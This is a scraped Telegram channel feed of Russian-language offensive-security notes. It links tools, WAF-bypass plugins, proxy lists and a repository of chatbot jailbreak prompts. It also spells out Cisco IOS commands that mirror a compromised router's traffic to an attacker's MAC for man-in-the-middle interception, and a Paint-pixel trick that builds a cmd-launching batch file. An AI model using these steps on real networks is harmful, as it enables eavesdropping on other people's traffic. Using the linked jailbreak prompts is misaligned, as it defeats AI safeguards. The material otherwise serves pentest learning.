Golden HackSpace | Hacker notes – Telegram
Golden HackSpace | Hacker notes
527 subscribers
91 photos
3 videos
37 files
147 links
Авторский канал по современной кибербезопасности без воды и лишнего мусора.

По вопросам можно обращаться в директ канала.
Download Telegram
Forwarded from RESOLUTE ATTACK
⚡️FREE OPEN SOURCE TOOLS

Инструкторы SANS создали листинг с более 150 инструментов с открытым исходным кодом, которые могут улучшить безопасность и эффективность

#Инструменты
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
🔥Tool for threat hunting in Azure

Умеет распознавать по MITRE

https://github.com/BlueTeamLabs/sentinel-attack

#azure #threathunting #dfir #sysmon #mitre
Forwarded from CrackCodes 🇮🇳 (Hayper)
🕵️‍♂️Руководство по поиску в твиттере(расширенный вариант)

🕵️‍♂️Twitter Search Guide (extended version)

#osint #twitter‌‌

Translation: ru-en
🕵️‍♂️Twitter Search Guide (Advanced)

🕵️‍♂️Twitter Search Guide (extended version)

#osint #twitter‌‌
🔥ChatGPT bot

Для тех, кто хочет поднять своего бота

https://github.com/altryne/chatGPT-telegram-bot/

#chatgpt #ai #telegram #bot
🔥403 bypass

#waf #bypass #forbidden
👌1
Golden HackSpace | Hacker notes
🔥403 bypass #waf #bypass #forbidden
🔥403 Bypasser

Автоматика для пассивного тестирования в Burp

https://github.com/sting8k/BurpSuite_403Bypasser

#forbidden #bypass #waf
Coolest_Careers_in_Cybersecurity-1.png
5.4 MB
🔥Infosec направления

Также есть ссылки на курсы от SANS, которые связаны с направлением.

Ставь лайк, если ты тут есть😄

#infosec #sans #learn #courses
👍1🔥1
🔥Cool cheatsheet's

Сборник красивых шпаргалок и иллюстраций. Очень хорошо подойдет, чтобы дать мозгу отдохнуть и посмотреть прикольные схемки.

https://securityzines.com/

#learn #cheatsheet
🔥Neural networks list

Список нейронок, которые отсортированы по категориям

Думаю, что-нибудь для себя точно найдете

https://share-docs.clickup.com/25598832/d/h/rd6vg-14247/0b79ca1dc0f7429

#ai #neural
🔥1
🔥Benchmark of subdomain enumeration tools

#subdomain #enumeration #recon #tool #benchmark
🔥1
🔥Traffic mirroring

///Идея///

Если при пентесте сети есть скомпрометированный маршрутизатор Cisco, то можно попробовать сделать зеркалирование траффика

///Реализация///

Создаем профиль ToAttacker для экспорта трафика:

router(config)#ip traffic-export profile ToAttacker mode export

Указываем экспорт всего траффика:

router(conf-rite)#bidirectional

На какой интерфейс экспортируем:

router(conf-rite)#interface FastEthernet0/1

Какому mac адресу произвести передачу траффика, указываем наш MAC:

router(conf-rite)#mac-address 72db.9842.4f97
router(conf-rite)#exit

На каком интерфейсе будем слушать траффик:

router(config)#interface FastEthernet0/0
router(config-if)#ip traffic-export apply ToAttacker

///Заключение///

По итогу реализации, маршрутизатор будет слать весь траффик на подконтрольное устройство, что дает нам полноценный MITM.

Недостатком данного способа является то, что подконтрольное устройство должно находиться в одной сети с маршрутизатором.

#cisco #mitm
👍3
Forwarded from Lazarus
👮 Роскомнадзор запустил систему автоматического поиска запрещенного контента «Окулус»

Главная задача «Окулус» – это выявление нарушений российского законодательства в изображениях и видеороликах. Система способна автоматически искать и распознавать нарушения закона в сети интернет.

«Система распознает изображения и символы, противоправные сцены и действия, анализирует текст в фото- и видеоматериалах. «Окулус» автоматически обнаруживает такие правонарушения, как экстремистская тематика, призывы к массовым незаконным мероприятиям, суициду, пронаркотический контент, пропаганда ЛГБТ и другие запрещённые действия», – пояснил СМИ представитель ГРЧЦ.

@Lazarus_link
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
🔥Prompt injection

Промпты, которые позволяют обойти цензуру ботов.

https://github.com/Cranot/chatbot-injections-exploits

#chatbot #chatgpt #bypass
🔥Proxy collection

Мой список ресурсов, где можно взять прокси

https://github.com/fate0/proxylist
https://github.com/ShiftyTR/Proxy-List
https://github.com/rdavydov/proxy-list
https://github.com/mmpx12/proxy-list
https://github.com/IshanSingla/proxy-list
https://github.com/monosans/proxy-list
https://github.com/S767/proxycheck
https://github.com/UptimerBot/proxy-list
https://github.com/TheSpeedX/PROXY-List
https://github.com/aswin-m-p/proxy-list
https://github.com/reny311/proxy
https://github.com/Volodichev/proxy-list
https://github.com/RX4096/proxy-list
https://github.com/manuGMG/proxy-365
https://github.com/HyperBeats/proxy-list
https://github.com/Koshsky/proxy-getter
https://github.com/mertguvencli/http-proxy-list
https://github.com/roosterkid/openproxylist
https://github.com/hookzof/socks5_list
https://github.com/ObcbO/getproxy
https://github.com/jetkai/proxy-list
https://github.com/yuewei5215/Proxies-1
https://github.com/clarketm/proxy-list
https://github.com/sunny9577/proxy-scraper
https://github.com/stamparm/fetch-some-proxies
https://github.com/almroot/proxylist
https://github.com/takelley1/proxy-servers
https://github.com/ph4ntonn/Stowaway
https://github.com/proxyips/proxylist
https://github.com/vaitan/proxy-list
https://github.com/h4mid007/free-proxy-list
https://github.com/danieldanielecki/IT-ARMY-of-Ukraine-Resources-in-English/tree/main/proxies
https://github.com/PXEiYyMH8F/ProxyBroker
https://docs.google.com/spreadsheets/d/1k0gAbcnTSxKBAy7bxXhrLciHbby5dM0dhZheaJ4CzFs/edit#gid=640455393
http://api.rawhub.net/free/alive.txt
https://raw.githubusercontent.com/Snizi/Curious-Cat-Nuker/master/proxies.txt
http://bayanbox.ir/view/8640940569635885502/proxy-list-28000.txt
https://www.instabypass.com/proxy/proxy/proxy584261.txt
https://www.paighambot.com/wp-content/uploads/Proxies.txt
https://onehack.us/uploads/short-url/AoUbDD7zKtsHdrqph3KoZDud46d.txt
https://ab57.ru/downloads/proxylist.txt
https://webanetlabs.net/freeproxyweb/proxylist_at_15.11.2020.txt
http://flss.ru/inc/proxy/logs/good/good_2022-01-23_11-38-31_61ed1407cdc6b.txt
https://raw.githubusercontent.com/inplex-sys/hq-proxy-list/main/https.txt
https://82.146.63.185/proxy_data.txt
https://raw.githubusercontent.com/Volodichev/proxy-list/main/http.txt
https://frederik.tv/download/file/6k-Proxy.txt?i=1
http://206.189.158.112/checked.06:49:54-2022:01:21/https.txt
https://raw.githubusercontent.com/jetkai/proxy-list/main/online-proxies/txt/proxies-http.txt
https://raw.githubusercontent.com/human1ty/proxy/main/http.txt

#proxy
👍1
🔥Spawn cmd via Paint

Для того, чтобы сгенерировать пейлоад с запуском CMD в paint:

- Создаем изображение 6x1 в пикселях.
- Далее устанавливаем последовательно цвета для каждого из 6 пикселей соответствуя таблице.

| R   | G   | B   |
| --- | --- | --- |
| 10 | 0 | 0 |
| 13 | 10 | 13 |
| 100 | 109 | 99 |
| 120 | 101 | 46 |
| 0 | 0 | 101 |
| 0 | 0 | 0 |

- Далее просто переименовываем файл в .bat и запускаем

#cmd #execution #fun